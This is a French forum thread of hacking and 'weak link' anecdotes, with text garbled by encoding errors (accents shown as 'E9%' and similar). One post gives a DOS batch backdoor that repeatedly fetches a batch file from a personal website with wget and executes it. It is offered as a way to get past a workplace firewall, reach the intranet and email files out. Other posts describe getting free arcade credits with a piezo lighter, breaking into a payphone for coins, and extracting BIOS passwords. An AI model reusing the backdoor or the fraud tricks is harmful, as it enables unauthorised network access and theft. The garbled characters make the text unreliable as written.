le maillon faible - Page 6

Re: le maillon faible

Tu es sFB%r qu'on peut saisir et enregistrer
_n'importe_ quelle valeur d'un octet ?

Ca me surprend.

--
-Stan

Re: le maillon faible
On May 21, 2:09A0%pm, Stan

Oui, c'E9%tait fait pour.
Tu peux essayer toi-meme sur ta bE9%cane.
Lance une session DOS, tapes "copy con test"
maintiens appuyE9%e la touche ALT,
tapes une valeur dE9%cimale sur 3 digits
*** sur le clavier numE9%rique ***
puis relache la touche ALT.
Pour finir et enregistrer le fichier : ctrl-Z.

Attends, j'essaie sous Win XP ...

 C:\copy con test
 alt-001 alt-002 alt-003
 alt-253 alt-254 alt-255
 ^Z

... oui, ca marche :
http://cjoint.com/?fvpGYPvmFa

ca c'est le fichier 'test'
E0% voir avec un E9%diteur hexa :
http://cjoint.com/?fvpJ7r3TyN

Et comme disait HervE9%, pas besoin de beaucoup
d'octets dans un COM pour faire des dE9%gats ...
( sans compter les batchs en mode texte pur )

Re: le maillon faible

Ok.

Dans l'histoire initiale,
le gars avait tout simplement utilisE9%
le programme debug.exe qui est toujours
prE9%sent.
D'aprE8%s le narateur, il avait
mEA%me mE9%morisE9% ( dans sa tEA%te ),
la centaine d'instructions assembleur.

--
-Stan

Re: le maillon faible
On May 21, 3:05A0%pm, Stan

Bon sang - mais c'est bien sur !
Hacker vaillant, rien d'impossible ;-)

( tu m'as grillE9% de vitesse, j'allais juste poster ca : )

Y'a meme bien mieux sous le DOS en version standard,
je l'ai toujours vu dans toutes les moutures Windows,
du coup c'est vraiment la Rolls grand luxe pour l'ASM.
http://cjoint.com/?fvqdxlbh7X

Re: le maillon faible

Capable de se reproduire en se greffant E0% des fichiers
executables.
Je ne me souvient plus des effets.
Peut EA%tre une corruption du MBR E0% une date anniversaire...

Certes.

Sans doute, mais ces deux mE9%thodes ont leur limite.
Celle que nous recherchons est vraiment trE8%s puissante...

Vite, remets-nous en charte avec une devinette ou une annecdote
en rapport avec le post initial :-))))

--
-Stan

Re: le maillon faible

quand on installait Word il modifiait la première disquette.
Il suffisait d'en faire une copie avant pour l'installer autant de fois
qu'on voulait

Re: le maillon faible
On May 21, 7:35A0%pm, moi-meme

 |  Une copine prof voulait installer Word

Les disquettes qu'elle avait E9%taient protE9%gE9%es en E9%criture
( le petit truc coulissant en haut E0% droite )
pour E9%viter de les E9%craser accidentellement,
et on a eu aucun problE8%me pour l'install.

Re: le maillon faible
On May 20, 4:38A0%pm, Stan

Devinette :
Comment faire exE9%cuter du code E0% volontE9% sur le PC
de votre boulot, depuis chez vous sur votre PC perso ?
Votre PC professionnel n'a qu'un accE8%s http port 80
via un browser internet et l'admin a bien fait son job :
il est rigoureusement impossible de se connecter
sur un PC (ou l'intranet) depuis l'extE9%rieur ...

Re: le maillon faible

Je ne crains de voir les electroniciens
nous lE2%cher si c'est trop orientE9% informatique.

--
-Stan

Re: le maillon faible

| Je ne crains de voir les electroniciens
| nous lE2%cher si c'est trop orientE9% informatique.

C'est pas faux. ( quoique de nos jours ... )
Bon, pas dur pour un softeux, mais je dE9%voile :

Avant de partir du boulot, faire tourner un batch
du genre ci-dessous (je n'ai plus l'original qui
E9%tait bien plus chiadE9% alors je tape de mE9%moire)
Une fois rentrE9% chez vous, poster sur votre site
perso le batch "fichier.bat" E0% exE9%cuter, qui pourra
exE9%cuter n'importe quel programme non bloquant.

Tous les accE9%s intranet vers d'autres machines seront
lE9%gitimes depuis votre machine qui est "E0% l'intE9%rieur".
Utilisable aussi comme proxy perso.
Vous pouvez vous faire renvoyer chez vous par email les
rE9%sultats de l'exE9%cution du batch (ou n'importe quel fichier)

Suite E0% un pari avec un admin junior, restE9% confidentiel
entre lui et moi. Quand on voit E0% quel point c'est
facile de lancer un batch ou un exE9%cutable sur le
PC d'une secrE9%taire (par exemple) : maillon faible !

REM    --- ca va te couter une biE8%re ---
debut:
REM    on supprime le batch E0% exE9%cuter
del    fichier.bat
boucle:
REM    temporisation d'une minute
wait    60
REM    on rE9%cupE8%re le batch
wget    http://mon_site_perso/fichier.bat
REM     si le fichier n'est pas rE9%cupE9%rE9%, on boucle
if    not exist fichier.bat goto boucle
REM    on exE9%cute le batch downloadE9%
call    fichier.bat
REM    on nettoie puis on reboucle
goto    debut
REM    --- fais pE9%ter la bibine ---

Re: le maillon faible

Vous avez sans doute entendu parler du fameux
hack A20 de la XBOX :

http://cjoint.com/?fvrCJCvErE

J'aime beaucoup le conseil #9 :-)

Bon retour en charte, n'est-ce pas ?

--
-Stan

Re: le maillon faible

J'ai bien aimE9%
AB% They did not read the Pentium programmers' manual BB%

J'ai un faible pour le #15 AB% keep your source safe BB%
C'est beau comme un password E9%crit
sur un post-it collE9% sur l'E9%cran du PC.

Mais le #1 est assez courant AB% Security vs. Money BB%
faites vite ET bien ... contradiction, ou contradiction ?

Re: le maillon faible
On May 20, 4:38A0%pm, Stan

La RAM permanente du chip d'horloge des anciens PC
servait E0% stocker de facon rE9%manente un password :
une sE9%ance dE9%ssoudage/lecture/ressoudage et c'est pliE9%.
(ou un petit programme tournant en mode rE9%E9l allant lire les
donnE9%es E0% la bonne adresses, mais chut ... c'est hors-charte)

Re: le maillon faible

J'ai entendu parler de distributeurs de billets de
banque attaquE9%s E0% l'aide d'allume-gaz E0% quartz !
L'arc E9%lectrique E0% haute tension convenablement appliquE9%
pouvait faire griller les circuits intE9%grE9%s de la machine.

Je ne sais pas si c'est vE9%ridique ou si c'est une lE9%gende,
mais si c'est vrai alors ca fait vraiment maillon faible :
haute technologie mise en dE9%faut par un truc E0% deux balles.

Re: le maillon faible

Dans ma jeunesse ( ? ), on obtenait
des dizaines de parties gratuites dans
les jeux d'arcanes.
Il fallait dE9%monter l'allume gaz piE9%zo, pour en faire
ressortir le fil qui E9%tait introduit dans la fente
du monnayeur. Deux ou trois impulsions, et c'est
autant de partie qui se crE9%ditaient.

Ce truc lE0%, je l'avais gardE9% pour plus tard,
mais tu m'a devancE9%.

Donc je confirme, E7%a eu marchE9%.
Mais je dE9%conseille quiconque de le faire
sur un distributeur de billets :-)
--
-Stan

Re: le maillon faible
On May 22, 11:43A0%am, Stan

Une attaque similaire mais purement mE9%canique (honte sur moi)
Sur le chemin du retour de l'E9%cole entre le collE8%ge et la maison,
il y avait une cabine tE9%lE9%phonique E0% piE8%ces : un bon coup de
genou judicieusement placE9% faisait invariablement tomber
assez de monnaie pour l'argent de poche du week-end !

... chacun son tour !

Bof, qui sait ?
C'est mieux que de trucider des convoyeurs de fonds ...

Re: le maillon faible

En fait, le but n'est pas de griller un circuit,
mais c'est l'impulsion electromagnE9%tique
ou les courants induits qui vont
changer les E9%tats de certaines entrE9%es.

J'ai rE9%-utilisE9% un allume gaz il y a deux
ou trois pour vE9%rifier l'immunitE9% d'une
carte d'acquisition rs232/ethernet.

En faisant des E9%tincelles sur le port
sE9%rie, E7%a faisait parfois planter le soft.

Cette carte avait une fE2%cheuse tendance
E0% planter lors d'orage...

--
-Stan

Re: le maillon faible
On May 22, 12:20A0%pm, Stan

... F4% dE9%sespoir !

Re: le maillon faible
Dans les années 40 (avant hier!)
nous jouions dans une salle de billard
avec les copains du collège.
Il fallait payer et un compteur se trouvait
en face du billard. On appuyait sur le téton
de ce compteur et le décompte s'arrêtait !
Donc à tour de role nous étions sur le compteur
et en même temps on surveillait le serveur pour ne pas se faire surprendre.
Quand il s'approchait, le premier qui le voyait tapait au sol avec la
queue de billard.!!! Des tournées de billard interminables !

Re: le maillon faible
On May 27, 8:41A0%am, era

Meme chose dans les 80's, avec un baby-foot dont on avait
trouvE9% comment coincer la tirette qui faisait tomber les balles :
avec une seule piE8%ce d'un franc on jouait tout l'aprE9%s-midi ...
( le patron du bar a fini par se demander pourquoi on
ne lui demandait jamais de nous faire de la monnaie :-)

Site Timeline